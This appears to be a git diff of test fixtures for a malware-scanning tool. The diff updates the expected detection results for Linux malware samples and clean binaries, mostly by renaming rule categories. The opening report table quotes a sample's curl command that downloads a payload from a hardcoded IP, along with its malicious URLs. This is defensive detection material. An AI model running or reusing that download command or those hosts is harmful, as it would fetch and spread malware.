[sleep 3](https://github.com/search?q=sleep+3&type=code) | | CRITICAL | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_download_ip) | Invokes curl to download a file from an IP | [curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o&type=code) | | HIGH | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#http_hardcoded_ip) | hardcoded IP address within a URL | [http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v](http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v)
[http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl](http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl) | diff --git a/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple b/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple index c9be21eeb..e86abfca0 100644 --- a/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple +++ b/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple @@ -21,7 +21,7 @@ discover/system/hostname_get: low discover/system/platform: low evasion/bypass_security/linux/se: medium evasion/bypass_security/linux/se_disable: high -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium exec/plugin: low exec/program: medium exec/shell/exec: medium @@ -53,6 +53,7 @@ impact/exploit/cve_list: medium impact/remote_access/kill_rm: medium impact/remote_access/reverse_shell: high impact/remote_access/systemctl: critical +lateral/scan/tool: medium lateral/ssh/attack: high malware/family/kaiji: critical net/dns: low diff --git a/tests/linux/2024.Mirai/ppc.simple b/tests/linux/2024.Mirai/ppc.simple index 63989f0ad..fdf8eff46 100644 --- a/tests/linux/2024.Mirai/ppc.simple +++ b/tests/linux/2024.Mirai/ppc.simple @@ -5,6 +5,7 @@ fs/proc/cpuinfo: medium fs/proc/stat: medium hw/cpu: medium impact/remote_access/router: high +lateral/scan/tool: medium malware/family/mirai: critical net/ip/parse: medium net/socket/local_addr: low diff --git a/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple b/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple index 0489009db..adfdcbd45 100644 --- a/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple +++ b/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple @@ -19,7 +19,7 @@ discover/system/hostname_get: low discover/system/platform: low discover/user/HOME: low discover/user/USER: low -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium exec/cmd: medium exec/plugin: low exec/program: medium @@ -46,6 +46,7 @@ fs/permission/chown: medium fs/permission/modify: medium impact/ransom/note: high impact/remote_access/reverse_shell: medium +lateral/scan/tool: medium net/dns: low net/dns/servers: low net/dns/txt: low diff --git a/tests/linux/2024.chisel/crondx.simple b/tests/linux/2024.chisel/crondx.simple index 3c58b6b40..ce62875f6 100644 --- a/tests/linux/2024.chisel/crondx.simple +++ b/tests/linux/2024.chisel/crondx.simple @@ -27,6 +27,7 @@ fs/path/etc_hosts: medium fs/path/etc_resolv.conf: low fs/permission/chown: medium fs/permission/modify: medium +lateral/scan/tool: medium net/dns: low net/dns/servers: low net/dns/txt: low diff --git a/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple b/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple index 456a2d854..f0e9223d4 100644 --- a/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple +++ b/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple @@ -25,7 +25,7 @@ discover/system/cpu_info: low discover/system/hostname_get: low discover/user/HOME: low evasion/bypass_security/linux/pam: medium -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium evasion/logging/acct: low exec/plugin: low exec/system_controls/systemd: medium @@ -44,6 +44,7 @@ fs/permission/chown: medium fs/permission/modify: medium impact/cryptojacking/nicehash_pool: high impact/cryptojacking/xmrig: high +lateral/scan/tool: medium net/dns: low net/dns/reverse: medium net/dns/servers: low diff --git a/tests/linux/2024.gas/gas.simple b/tests/linux/2024.gas/gas.simple index 2765835ac..85fcb740d 100644 --- a/tests/linux/2024.gas/gas.simple +++ b/tests/linux/2024.gas/gas.simple @@ -28,6 +28,7 @@ hw/cpu: medium impact/exploit/GCONV_PATH: low impact/remote_access/dl_iterate: high impact/remote_access/reverse_shell: medium +lateral/scan/tool: medium net/socket/send: low net/url/embedded: low process/create: low diff --git a/tests/linux/2024.hadooken/crondr_as_bash.sh.simple b/tests/linux/2024.hadooken/crondr_as_bash.sh.simple index 7010cb07e..e5453d82d 100644 --- a/tests/linux/2024.hadooken/crondr_as_bash.sh.simple +++ b/tests/linux/2024.hadooken/crondr_as_bash.sh.simple @@ -1,5 +1,5 @@ # linux/2024.hadooken/crondr_as_bash.sh: critical -evasion/covert_location/chdir_unusual: high +evasion/file/location/chdir_unusual: high evasion/mimicry/fake_process: high evasion/self_deletion/copy_run_delete: critical exec/shell/exec: medium diff --git a/tests/linux/2024.hadooken/ssh_worm.sh.simple b/tests/linux/2024.hadooken/ssh_worm.sh.simple index d918a8b0e..84202d84b 100644 --- a/tests/linux/2024.hadooken/ssh_worm.sh.simple +++ b/tests/linux/2024.hadooken/ssh_worm.sh.simple @@ -9,7 +9,7 @@ credential/ssh: high data/base64/external: medium data/embedded/base64_url: medium data/encoding/base64: low -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium exec/shell/pipe_sh: medium exec/shell/tmp_semicolon: high exfil/stealer/linux_server: high diff --git a/tests/linux/2024.k4spreader/degrader.sh.simple b/tests/linux/2024.k4spreader/degrader.sh.simple index 5d6c337f8..5da701263 100644 --- a/tests/linux/2024.k4spreader/degrader.sh.simple +++ b/tests/linux/2024.k4spreader/degrader.sh.simple @@ -4,5 +4,4 @@ evasion/bypass_security/linux/ufw: medium evasion/hijack_execution/etc_ld.so.preload: high fs/attributes/chattr: medium fs/path/etc: low -impact/degrade/iptables: high -impact/degrade/ufw: high +impact/degrade/firewall: high diff --git a/tests/linux/2024.k4spreader/knlib.simple b/tests/linux/2024.k4spreader/knlib.simple index 435f19650..fd69bf578 100644 --- a/tests/linux/2024.k4spreader/knlib.simple +++ b/tests/linux/2024.k4spreader/knlib.simple @@ -1,5 +1,5 @@ # linux/2024.k4spreader/knlib: critical -evasion/covert_location/chdir_unusual: high +evasion/file/location/chdir_unusual: high evasion/self_deletion/copy_run_delete: critical exec/shell/exec: medium exec/shell/ignore_output: medium diff --git a/tests/linux/2024.kubo_injector/injector.json b/tests/linux/2024.kubo_injector/injector.json index 462a28c6a..457ebb356 100644 --- a/tests/linux/2024.kubo_injector/injector.json +++ b/tests/linux/2024.kubo_injector/injector.json @@ -15,26 +15,30 @@ { "Description": "may inject code into other processes", "MatchStrings": [ - "/proc/%d/maps", - "process", - "ptrace" + "/proc", + "maps", + "successfully injected", + "to inject", + "to-inject" ], "RiskScore": 3, "RiskLevel": "HIGH", - "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/process-inject.yara#ptrace_injector", + "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/process-inject.yara#library_injector", "ID": "evasion/process_injection/process_inject", - "RuleName": "ptrace_injector" + "RuleName": "library_injector" }, { - "Description": "trace or modify system calls", + "Description": "may inject code into other processes", "MatchStrings": [ + "/proc/%d/maps", + "process", "ptrace" ], - "RiskScore": 2, - "RiskLevel": "MEDIUM", - "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#ptrace", + "RiskScore": 3, + "RiskLevel": "HIGH", + "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#ptrace_injector", "ID": "evasion/process_injection/ptrace", - "RuleName": "ptrace" + "RuleName": "ptrace_injector" }, { "Description": "get the address of a symbol", diff --git a/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple b/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple index cee09e8ae..580ffc3ed 100644 --- a/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple +++ b/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple @@ -41,10 +41,10 @@ discover/system/sysinfo: medium discover/user/HOME: low discover/user/USER: low discover/user/name_get: medium -evasion/covert_location/chdir_unusual: medium -evasion/covert_location/dev_shm: medium -evasion/hidden_paths/dev_shm: critical -evasion/hidden_paths/hidden: high +evasion/file/location/chdir_unusual: medium +evasion/file/location/dev_shm: medium +evasion/file/prefix: high +evasion/file/prefix/dev: critical evasion/hijack_execution/LD_LIBRARY_PATH: low evasion/logging/current_logins: medium evasion/logging/hide_shell_history: high @@ -104,6 +104,7 @@ impact/remote_access/kill_rm: medium impact/remote_access/net_exec: medium impact/remote_access/pseudo_terminal: medium impact/remote_access/reverse_shell: high +lateral/scan/tool: medium malware/family/emp3r0r: critical net/dns: low net/dns/over_https: medium diff --git a/tests/linux/2024.kworker_pretenders/gafgyt.simple b/tests/linux/2024.kworker_pretenders/gafgyt.simple index d05ad257d..5abb9cf5a 100644 --- a/tests/linux/2024.kworker_pretenders/gafgyt.simple +++ b/tests/linux/2024.kworker_pretenders/gafgyt.simple @@ -5,9 +5,9 @@ anti-static/packer/elf: high credential/ssh/d: medium data/base64/external: medium data/encoding/base64: low -evasion/covert_location/dev_shm: medium -evasion/hidden_paths/var_run: medium -evasion/hidden_paths/var_tmp: medium +evasion/file/location/dev_shm: medium +evasion/file/location/var_run: medium +evasion/file/location/var_tmp: medium evasion/mimicry/fake_process: critical exec/shell/echo: medium exec/shell/exec: medium @@ -23,6 +23,7 @@ fs/path/usr_sbin: low fs/path/var: low fs/proc/arbitrary_pid: medium fs/proc/self_exe: medium +lateral/scan/tool: medium net/dns/servers: low net/http/request: low net/socket/send: low diff --git a/tests/linux/2024.medusa/rkload.simple b/tests/linux/2024.medusa/rkload.simple index 79a6bc7ad..fce1bdc25 100644 --- a/tests/linux/2024.medusa/rkload.simple +++ b/tests/linux/2024.medusa/rkload.simple @@ -6,18 +6,22 @@ anti-static/xor/commands: high credential/ssh/d: medium discover/system/cpu_info: low discover/system/sysinfo: medium -evasion/covert_location/dev_shm: high -evasion/hidden_paths/dev_shm: critical -evasion/hidden_paths/hidden: high -evasion/hide_artifacts/system_directories: medium +evasion/file/location/dev_shm: high +evasion/file/location/lib: high +evasion/file/location/system_directories: medium +evasion/file/prefix: high +evasion/file/prefix/dev: critical +evasion/file/prefix/lib: high evasion/hijack_execution/LD_LIBRARY_PATH: low evasion/hijack_execution/etc_ld.so.preload: medium +evasion/rootkit/linux_userspace: critical exec/conditional/LANG: low exec/dylib/address_check: low exec/dylib/symbol_address: medium exec/program: medium exec/program/background: low exec/shell/exec: medium +exfil/stealer/ssh: high fs/attributes/set: medium fs/directory/create: low fs/file/copy: medium @@ -37,7 +41,7 @@ fs/tempdir/TMPDIR: low hw/cpu: medium impact/exploit/GCONV_PATH: low impact/remote_access/reverse_shell: medium -impact/rootkit/readdir_interceptor: high +lateral/scan/tool: medium malware/family/medusa: critical net/socket/local_addr: low net/socket/send: low diff --git a/tests/linux/2024.miner_dropper/drop.sh.simple b/tests/linux/2024.miner_dropper/drop.sh.simple index ed3045bb0..8f15244cb 100644 --- a/tests/linux/2024.miner_dropper/drop.sh.simple +++ b/tests/linux/2024.miner_dropper/drop.sh.simple @@ -1,7 +1,7 @@ # linux/2024.miner_dropper/drop.sh: critical c2/addr/ip: high c2/tool_transfer/shell: critical -evasion/covert_location/chdir_unusual: critical +evasion/file/location/chdir_unusual: critical exec/shell/busybox_exec: high exec/shell/exec: medium exec/shell/relative_semicolon: high diff --git a/tests/linux/2024.sbcl.market/sbcl.sdiff b/tests/linux/2024.sbcl.market/sbcl.sdiff index f2962b838..08e466ca4 100644 --- a/tests/linux/2024.sbcl.market/sbcl.sdiff +++ b/tests/linux/2024.sbcl.market/sbcl.sdiff @@ -2,7 +2,7 @@ -data/compression/zstd -discover/user/HOME -discover/user/USER --evasion/hidden_paths/var_tmp +-evasion/file/location/var_tmp -exec/dylib/address_check -exec/dylib/symbol_address -exec/program @@ -19,12 +19,13 @@ -fs/symlink_resolve -net/url/embedded ++++ added: sbcl.dirty ++anti-static/elf/entropy +anti-static/packer/high_entropy +data/compression/zstd +data/embedded/zstd +discover/user/HOME +discover/user/USER -+evasion/hidden_paths/var_tmp ++evasion/file/location/var_tmp +exec/dylib/address_check +exec/dylib/symbol_address +exec/program diff --git a/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple b/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple index 43567cf92..2b97f9fd3 100644 --- a/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple +++ b/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple @@ -1,4 +1,5 @@ # linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf: critical +anti-static/elf/entropy: high anti-static/packer/elf: high anti-static/packer/high_entropy: medium anti-static/packer/upx: high diff --git a/tests/linux/UPX/06ed158.md b/tests/linux/UPX/06ed158.md index d9e616d5f..54b37428f 100644 --- a/tests/linux/UPX/06ed158.md +++ b/tests/linux/UPX/06ed158.md @@ -2,6 +2,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|-------------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------|------------------------------------------------------| +| HIGH | [anti-static/elf/entropy](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/entropy.yara#normal_elf_high_entropy_7_2) | high entropy ELF binary (>7.2) | | | HIGH | [anti-static/packer/elf](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/elf.yara#obfuscated_elf) | Obfuscated ELF binary (missing symbols) | | | HIGH | [anti-static/packer/high_entropy](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/high_entropy.yara#high_entropy_7_9) | high entropy binary (>7.9) | | | HIGH | [anti-static/packer/upx](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/upx.yara#upx) | Binary is packed with UPX | [UPX!](https://github.com/search?q=UPX%21&type=code) | diff --git a/tests/linux/clean/appsec-rules.json.simple b/tests/linux/clean/appsec-rules.json.simple index 21880ef60..0de75e3f4 100644 --- a/tests/linux/clean/appsec-rules.json.simple +++ b/tests/linux/clean/appsec-rules.json.simple @@ -24,7 +24,7 @@ discover/system/platform: low discover/user/name_get: medium evasion/bypass_security/linux/iptables: medium evasion/bypass_security/linux/ufw: medium -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium evasion/logging/acct: low evasion/process_injection/readelf: medium exec/plugin: low @@ -52,6 +52,7 @@ hw/wireless: low impact/exploit: medium impact/exploit/cve: medium impact/remote_access/iptables: medium +lateral/scan/tool: medium net/dns/servers: low net/download: medium net/http/cookies: medium diff --git a/tests/linux/clean/caddy.simple b/tests/linux/clean/caddy.simple index 5ee09852f..b144dd59e 100644 --- a/tests/linux/clean/caddy.simple +++ b/tests/linux/clean/caddy.simple @@ -44,8 +44,8 @@ discover/system/platform: medium discover/user/HOME: low discover/user/USER: low discover/user/name_get: low -evasion/hidden_paths/hidden: medium -evasion/hidden_paths/var_run: medium +evasion/file/location/var_run: medium +evasion/file/prefix: medium exec/cmd: medium exec/conditional/LANG: low exec/install_additional/package_install: medium diff --git a/tests/linux/clean/chezmoi.simple b/tests/linux/clean/chezmoi.simple index c2698a743..8d70e7c8a 100644 --- a/tests/linux/clean/chezmoi.simple +++ b/tests/linux/clean/chezmoi.simple @@ -53,7 +53,7 @@ discover/system/sysinfo: medium discover/user/HOME: low discover/user/USER: low discover/user/name_get: medium -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium exec/cmd: medium exec/conditional/LANG: low exec/plugin: low diff --git a/tests/linux/clean/chrome.simple b/tests/linux/clean/chrome.simple index ef7e5ac8b..202202cb5 100644 --- a/tests/linux/clean/chrome.simple +++ b/tests/linux/clean/chrome.simple @@ -45,7 +45,7 @@ discover/system/sysinfo: medium discover/user/HOME: low discover/user/USER: low evasion/bypass_security/linux/ufw: medium -evasion/covert_location/dev_shm: medium +evasion/file/location/dev_shm: medium evasion/hijack_execution/LD_LIBRARY_PATH: low evasion/process_injection/ptrace: medium exec/cmd: medium @@ -164,7 +164,7 @@ process/groups_set: low process/multithreaded: low process/name_get: medium process/parent_pid_get: low -process/thread_local_storage: low +process/thread_local_storage: medium process/userid_set: low sus/exclamation: medium sus/intercept: medium diff --git a/tests/linux/clean/clickhouse.simple b/tests/linux/clean/clickhouse.simple index 9dc863651..dc8a4d60e 100644 --- a/tests/linux/clean/clickhouse.simple +++ b/tests/linux/clean/clickhouse.simple @@ -53,9 +53,8 @@ discover/user/HOME: low discover/user/USER: low discover/user/name_get: low evasion/bypass_security/linux/ufw: medium -evasion/covert_location/dev_shm: medium -evasion/hidden_paths/hidden: medium -evasion/hidden_paths/relative_hidden: low +evasion/file/location/dev_shm: medium +evasion/file/prefix: medium evasion/hijack_execution/DYLD_LIBRARY_PATH: medium evasion/hijack_execution/LD_LIBRARY_PATH: low evasion/logging/acct: low @@ -69,6 +68,7 @@ exec/install_additional/package_install: medium exec/plugin: low exec/program: medium exec/program/background: low +exec/program/hidden: low exec/shell/SHELL: low exec/shell/TERM: low exec/shell/background_sleep: medium @@ -182,7 +182,7 @@ process/executable_path: low process/groupid_set: low process/multithreaded: low process/name_get: medium -process/thread_local_storage: low +process/thread_local_storage: medium process/userid_set: low sus/exclamation: medium sus/intercept: medium diff --git a/tests/linux/clean/code-oss.md b/tests/linux/clean/code-oss.md index e15d38abd..8b919a187 100644 --- a/tests/linux/clean/code-oss.md +++ b/tests/linux/clean/code-oss.md @@ -59,6 +59,7 @@ | MEDIUM | [impact/ransom/decryptor](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/ransom/decryptor.yara#decryptor) | References 'decryptor' | [decryptor](https://github.com/search?q=decryptor&type=code) | | MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [Failed to deserialized Heartbeat info pa](https://github.com/search?q=Failed+to+deserialized+Heartbeat+info+pa&type=code)
[Invalid heartbeat info:](https://github.com/search?q=Invalid+heartbeat+info%3A&type=code)
[No Heartbeat Info pa](https://github.com/search?q=No+Heartbeat+Info+pa&type=code)
[heartbeat:](https://github.com/search?q=heartbeat%3A&type=code)
[heartbeat_handler](https://github.com/search?q=heartbeat_handler&type=code) | | MEDIUM | [lateral/scan/target_ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/target_ip.yara#target_ip) | References a target IP | [target IP](https://github.com/search?q=target+IP&type=code)
[target_ip](https://github.com/search?q=target_ip&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [%d.%d.%d.%d](https://github.com/search?q=%25d.%25d.%25d.%25d&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [net/dns/over_https](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-over-https.yara#doh_refs) | Supports DNS (Domain Name Service) over HTTPS | [DnsOverHttps](https://github.com/search?q=DnsOverHttps&type=code)
[application/dns-message](https://github.com/search?q=application%2Fdns-message&type=code) | | MEDIUM | [net/dns/reverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-reverse.yara#in_addr_arpa) | looks up the reverse hostname for an IP | [.in-addr.arpa](https://github.com/search?q=.in-addr.arpa&type=code)
[ip6.arpa](https://github.com/search?q=ip6.arpa&type=code) | | MEDIUM | [net/http/content_length_0](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/content-length-0.yara#content_length_0) | Sets HTTP content length to zero | [Content-Length: 0](https://github.com/search?q=Content-Length%3A+0&type=code) | @@ -82,6 +83,7 @@ | MEDIUM | [os/kernel/opencl](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/opencl.yara#OpenCL) | support for OpenCL | [OpenCL](https://github.com/search?q=OpenCL&type=code) | | MEDIUM | [privesc/sudo](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/sudo.yara#sudo) | calls sudo | [sudo chmod 1777 /dev/shm](https://github.com/search?q=sudo+chmod+1777+%2Fdev%2Fshm&type=code) | | MEDIUM | [process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | +| MEDIUM | [process/thread_local_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/thread_local_storage.yara#tls_get_addr) | [looks up memory addresses for thread local storage or linked libraries](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | | MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [!!!!!!!!!!!!!!!!](https://github.com/search?q=%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21&type=code)
[0 !!!!](https://github.com/search?q=0+++++++%21%21%21%21&type=code)
[0 !!!](https://github.com/search?q=0+++++%21%21%21&type=code)
[11366 !!](https://github.com/search?q=11366++++++%21%21&type=code)
[12366 !!!](https://github.com/search?q=12366++++++%21%21%21&type=code)
[12366 !!](https://github.com/search?q=12366+++++%21%21&type=code)
[AAHHKKO !!](https://github.com/search?q=AAHHKKO+++%21%21&type=code)
[ABHH !!](https://github.com/search?q=ABHH+++++%21%21&type=code)
[ABHH !!](https://github.com/search?q=ABHH++++%21%21&type=code)
[ACHIJNPRU !!](https://github.com/search?q=ACHIJNPRU+++%21%21&type=code)
[AGG !!](https://github.com/search?q=AGG+++++%21%21&type=code)
[CGIJMOQS !!](https://github.com/search?q=CGIJMOQS++++%21%21&type=code)
[Could not format log message !!](https://github.com/search?q=Could+not+format+log+message+%21%21&type=code)
[EE !!](https://github.com/search?q=EE++++%21%21&type=code)
[FFHHL !!](https://github.com/search?q=FFHHL+++%21%21&type=code)
[GG !!](https://github.com/search?q=GG++++%21%21&type=code)
[INVALID CONSTRUCTOR!!!](https://github.com/search?q=INVALID+CONSTRUCTOR%21%21%21&type=code)
[INVALID MAP!!!](https://github.com/search?q=INVALID+MAP%21%21%21&type=code)
[INVALID SHARED ON CONSTRUCTOR!!!](https://github.com/search?q=INVALID+SHARED+ON+CONSTRUCTOR%21%21%21&type=code)
[return !!](https://github.com/search?q=return+%21%21&type=code) | | MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [interceptBufferProtocol](https://github.com/search?q=interceptBufferProtocol&type=code)
[interceptFileProtocol](https://github.com/search?q=interceptFileProtocol&type=code)
[interceptHttpProtocol](https://github.com/search?q=interceptHttpProtocol&type=code)
[interceptResponse](https://github.com/search?q=interceptResponse&type=code)
[interceptStreamProtocol](https://github.com/search?q=interceptStreamProtocol&type=code)
[interceptStringProtocol](https://github.com/search?q=interceptStringProtocol&type=code)
[intercepted](https://github.com/search?q=intercepted&type=code)
[intercepting](https://github.com/search?q=intercepting&type=code)
[interceptionId](https://github.com/search?q=interceptionId&type=code)
[interceptionStage](https://github.com/search?q=interceptionStage&type=code)
[interceptorConfig](https://github.com/search?q=interceptorConfig&type=code)
[interceptorEv](https://github.com/search?q=interceptorEv&type=code)
[interceptor_config](https://github.com/search?q=interceptor_config&type=code)
[interceptor_info_map](https://github.com/search?q=interceptor_info_map&type=code)
[interceptor_url_loader_throttle](https://github.com/search?q=interceptor_url_loader_throttle&type=code)
[interceptors](https://github.com/search?q=interceptors&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) | | MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | @@ -105,13 +107,13 @@ | LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [evasion/hidden_paths/relative_hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/relative-hidden.yara#relative_hidden_launcher) | relative hidden launcher | [./.691.9B](https://github.com/search?q=.%2F.691.9B&type=code)
[bash](https://github.com/search?q=bash&type=code)
[exec](https://github.com/search?q=exec&type=code)
[system](https://github.com/search?q=system&type=code) | | LOW | [evasion/hijack_execution/LD_LIBRARY_PATH](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hijack_execution/LD_LIBRARY_PATH.yara#ld_library_path) | ld library path | [LD_LIBRARY_PATH](https://github.com/search?q=LD_LIBRARY_PATH&type=code) | | LOW | [exec/conditional/LANG](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/conditional/LANG.yara#LANG_getenv) | Looks up language of current user | [LANG](https://github.com/search?q=LANG&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [exec/dylib/address_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/address-check.yara#dladdr) | [determine if address belongs to a shared library](https://man7.org/linux/man-pages/man3/dladdr.3.html) | [dladdr](https://github.com/search?q=dladdr&type=code) | | LOW | [exec/dylib/iterate](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/iterate.yara#dl_iterate_phdr) | [iterate over list of shared objects](https://man7.org/linux/man-pages/man3/dl_iterate_phdr.3.html) | [dl_iterate_phdr](https://github.com/search?q=dl_iterate_phdr&type=code) | | LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [Chromium PDF Plugin](https://github.com/search?q=Chromium+PDF+Plugin&type=code)
[ContainsPlugins](https://github.com/search?q=ContainsPlugins&type=code)
[Failed to generate a plugin id](https://github.com/search?q=Failed+to+generate+a+plugin+id&type=code)
[GetPluginInfo](https://github.com/search?q=GetPluginInfo&type=code)
[GetPlugins](https://github.com/search?q=GetPlugins&type=code)
[If you want to block plugins](https://github.com/search?q=If+you+want+to+block+plugins&type=code)
[Is an accelerated plugin](https://github.com/search?q=Is+an+accelerated+plugin&type=code)
[LoadPluginsSoon](https://github.com/search?q=LoadPluginsSoon&type=code)
[No PPP_GetInterface in plugin library](https://github.com/search?q=No+PPP_GetInterface+in+plugin+library&type=code)
[No PPP_InitializeModule in plugin library](https://github.com/search?q=No+PPP_InitializeModule+in+plugin+library&type=code)
[OnPepperPluginCrashed](https://github.com/search?q=OnPepperPluginCrashed&type=code)
[OnPepperPluginHung](https://github.com/search?q=OnPepperPluginHung&type=code)
[OpenChannelToPepperPlugin](https://github.com/search?q=OpenChannelToPepperPlugin&type=code)
[Pepper Plugin Broker](https://github.com/search?q=Pepper+Plugin+Broker&type=code)
[PepperPluginInstance](https://github.com/search?q=PepperPluginInstance&type=code)
[Plugin Changed](https://github.com/search?q=Plugin+Changed&type=code)
[Plugin URL](https://github.com/search?q=Plugin+URL&type=code)
[Plugin doesn](https://github.com/search?q=Plugin+doesn&type=code)
[PluginArray](https://github.com/search?q=PluginArray&type=code)
[PluginContextSecurity](https://github.com/search?q=PluginContextSecurity&type=code)
[PluginData](https://github.com/search?q=PluginData&type=code)
[PluginDispatcher](https://github.com/search?q=PluginDispatcher&type=code)
[PluginLoad](https://github.com/search?q=PluginLoad&type=code)
[PluginPrivate](https://github.com/search?q=PluginPrivate&type=code)
[PluginRegistry](https://github.com/search?q=PluginRegistry&type=code)
[PluginResource](https://github.com/search?q=PluginResource&type=code)
[PluginService](https://github.com/search?q=PluginService&type=code)
[PluginSizeUpdated](https://github.com/search?q=PluginSizeUpdated&type=code)
[PpapiMsg_LoadPlugin](https://github.com/search?q=PpapiMsg_LoadPlugin&type=code)
[PpapiPluginMain](https://github.com/search?q=PpapiPluginMain&type=code)
[PpapiPluginMetrics](https://github.com/search?q=PpapiPluginMetrics&type=code)
